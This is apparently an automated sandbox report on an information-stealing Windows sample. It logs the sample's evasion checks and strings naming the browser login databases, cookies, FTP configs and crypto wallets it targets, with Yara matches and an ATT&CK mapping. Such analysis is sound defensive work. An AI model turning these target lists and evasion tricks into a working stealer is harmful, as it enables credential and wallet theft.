                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeMemory allocated: 1710000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeMemory allocated: 3400000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeMemory allocated: 5400000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWindow / User API: threadDelayed 1992Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWindow / User API: threadDelayed 7740Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe TID: 7472Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841017062.00000000017EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1848934796.0000000007397000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1846698413.0000000006C32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe.c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1841742804.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe PID: 7300, type: MEMORYSTR
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000035C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxxLiberty
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000035C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000035C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000035C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                      Source: Yara matchFile source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe.c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe PID: 7300, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe.c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1841742804.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe PID: 7300, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      231
                      Security Software Discovery
                      Remote Services1
                      Archive Collected Data
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop Protocol3
                      Data from Local System
                      11
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
                      Virtualization/Sandbox Evasion
                      Security Account Manager241
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Ingress Tool Transfer
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeylogging14
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Timestomp
                      Cached Domain Credentials113
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe69%VirustotalBrowse
